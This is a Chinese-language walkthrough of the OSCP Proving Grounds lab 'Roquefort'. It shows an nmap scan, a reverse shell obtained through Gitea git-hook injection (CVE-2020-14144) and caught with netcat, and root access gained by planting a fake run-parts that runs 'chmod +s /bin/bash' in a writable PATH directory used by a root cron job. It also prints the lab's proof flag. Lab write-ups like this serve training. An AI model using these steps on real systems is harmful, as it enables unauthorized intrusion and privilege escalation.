当前位置：首页 > article >正文

OSCP - Proving Grounds - Roquefort

article 2025/2/4 20:04:39

主要知识点

githook 注入
Linux path覆盖

具体步骤

依旧是nmap扫描开始，3000端口不是很熟悉，先看一下

Nmap scan report for 192.168.54.67
Host is up (0.00083s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE  SERVICE VERSION
21/tcp   open   ftp     ProFTPD 1.3.5b
22/tcp   open   ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:77:6f:b1:ed:65:b5:ad:14:64:40:d2:24:d3:9c:0d (RSA)
|   256 a9:b4:4f:61:2e:2d:9d:4c:48:15:fe:70:8e:fa:af:b3 (ECDSA)
|_  256 92:56:eb:af:c9:34:af:ea:a1:cf:9f:e1:90:dd:2f:61 (ED25519)
53/tcp   closed domain
2222/tcp open   ssh     Dropbear sshd 2016.74 (protocol 2.0)
3000/tcp open   ppp?

发现是 gitea ,版本为1.7.5，

搜索一下得到 https://github.com/p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce，简单阅读一下发现是利用githook执行系统命令创建反弹shell

尝试利用弱密码登录http://192.168.156.67:300/发现失败，于是创建一个用户试试，再创建一个新项目后尝试更改githook

保存后在本地clone相关项目，做些更改后再提交，反弹shell创建成功

C:\home\kali\Documents\OFFSEC\GoToWork\Roquefort\Test> vi test.txt 
                                                                                                                                                                                                                                            
C:\home\kali\Documents\OFFSEC\GoToWork\Roquefort\Test> git add *             
                                                                                                                                                                                                                                            
C:\home\kali\Documents\OFFSEC\GoToWork\Roquefort\Test> git commit -m "test1" 
[master 9925c74] test1
 1 file changed, 1 insertion(+), 1 deletion(-)
                                                                                                                                                                                                                                            
C:\home\kali\Documents\OFFSEC\GoToWork\Roquefort\Test> git push origin master
Username for 'http://192.168.156.67:3000': timothy
Password for 'http://timothy@192.168.156.67:3000': 
remote: invalid credentials
fatal: Authentication failed for 'http://192.168.156.67:3000/timothy/Test/'
                                                                                                                                                                                                                                            
C:\home\kali\Documents\OFFSEC\GoToWork\Roquefort\Test> git push origin master
Username for 'http://192.168.156.67:3000': timothy
Password for 'http://timothy@192.168.156.67:3000': 
Enumerating objects: 5, done.
Counting objects: 100% (5/5), done.
Delta compression using up to 4 threads
Compressing objects: 100% (2/2), done.
Writing objects: 100% (3/3), 266 bytes | 266.00 KiB/s, done.
Total 3 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)

C:\home\kali\Documents\OFFSEC\GoToWork\Roquefort> nc -nlvp 2222
listening on [any] 2222 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.156.67] 48668
bash: cannot set terminal process group (753): Inappropriate ioctl for device
bash: no job control in this shell
chloe@roquefort:~/gitea-repositories/timothy/test.git$ whoami
whoami
chloe

无法sudo,suid也没发现有用的信息，尝试上传Linpeas.sh发现该用户对于/usr/local/bin有写权限，所以也许可以覆盖linux path后面的命令来提权(linux寻找可执行文件是从path左到右的各个路径去找）

......
......
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
......
......

再执行pspy64,发现run-parts会被定期执行，于是我们可以尝试覆盖run-parts

./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2024/10/27 19:34:31 CMD: UID=0    PID=92     | 
2024/10/27 19:34:31 CMD: UID=0    PID=9      | 
......
......
2024/10/27 19:35:01 CMD: UID=0    PID=14147  | /bin/sh -c    cd / && run-parts --report /etc/cron.hourly 
......
......

/bin/路径在path中的位置是在/usr/local/bin后面，所以成功提权

chloe@roquefort:~$ whereis run-parts
whereis run-parts
run-parts: /bin/run-parts /usr/share/man/man8/run-parts.8.gz
chloe@roquefort:~$ cd /usr/local/bin
lscd /usr/local/bin -l
chloe@roquefort:/usr/local/bin$ 
ls -l
total 63772
-rwxr-xr-x 1 root staff 65299840 Mar  6  2020 gitea
chloe@roquefort:/usr/local/bin$ echo "chmod +s /bin/bash" > run-parts
echo "chmod +s /bin/bash" > run-parts
chloe@roquefort:/usr/local/bin$ chmod +x run-parts
chmod +x run-partsl
chloe@roquefort:/usr/local/bin$ s -l
chloe@roquefort:/usr/local/bin$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1099016 May 15  2017 /bin/bash
chloe@roquefort:/usr/local/bin$ /bin/bash -p
/bin/bash -p
id
uid=1000(chloe) gid=1000(chloe) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(chloe)
cat /root/proof.txt
203a640d81971f425ddb028950a9c595

查看全文

http://www.kler.cn/a/531500.html